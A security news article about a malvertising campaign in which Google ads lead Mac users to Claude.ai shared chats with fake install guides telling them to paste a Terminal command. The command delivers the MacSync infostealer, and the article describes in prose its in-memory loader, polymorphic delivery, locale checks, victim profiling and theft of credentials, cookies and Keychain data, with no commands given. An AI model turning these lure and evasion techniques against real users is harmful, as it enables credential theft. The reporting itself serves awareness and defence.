Attackers are abusing Google Ads and legitimate Claude.ai shared chats in a new malvertising campaign that targets Mac users looking for Claude downloads.
Users who search for “Claude mac download” may see sponsored Google search results that appear to point to the real claude.ai website. But instead of taking users to a safe download page, the ads lead to Claude shared chats that contain fake installation instructions designed to install malware on macOS devices.
The campaign was first spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. He found a Claude.ai shared chat that pretended to be an official “Claude Code on Mac” installation guide and falsely attributed the instructions to “Apple Support.”
The shared chat tells users to open Terminal and paste a command. That command silently downloads and runs malware on the victim’s Mac.
While checking Albayrak’s findings, BleepingComputer found another Claude shared chat being used for the same type of attack. The second version used different domains and payloads, but followed the same structure and social engineering method. Both chats were publicly accessible at the time of writing.
The malicious commands shown in the shared Claude chats download encoded shell scripts from attacker-controlled domains. One version observed by Albayrak used a domain linked to customroofingcontractors, while another version seen by BleepingComputer pulled a loader script from a separate domain.
In the second case, the downloaded loader script contained Gunzip-compressed shell instructions. The script ran entirely in memory, which makes it harder for users to notice anything unusual on the disk.
BleepingComputer also found that the server delivered a differently obfuscated version of the payload with each request. This method, known as polymorphic delivery, can make detection harder because security tools may not be able to rely on a single known file hash or signature.
One malware variant checked whether the Mac had Russian or CIS-region keyboard input sources configured. If it found one, the script stopped running and quietly sent a status message back to the attacker’s server. Devices that passed this check were allowed to continue to the next stage.
Before moving further, the script also collected the victim’s external IP address, hostname, macOS version, and keyboard locale. This information was sent back to the attacker, suggesting the operators were profiling victims before deciding whether to deliver the next payload.
The malware then downloaded a second-stage payload and ran it through osascript, a built-in macOS scripting tool. This allowed the attackers to execute code without dropping a traditional app or binary file.
The variant found by Albayrak appeared to work more directly. Instead of using the same profiling steps, it moved straight to execution. It stole browser credentials, cookies, and macOS Keychain data, then packed the information and sent it to the attacker’s server. Albayrak identified it as a variant of the MacSync macOS infostealer.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Malvertising has become a common way to spread malware. In many previous campaigns, attackers used Google ads that looked legitimate but sent users to fake websites. This campaign is different because the visible destination is not a fake domain. The ads point to Anthropic’s real claude.ai domain, while the malicious instructions are hosted inside Claude’s own shared chat feature.
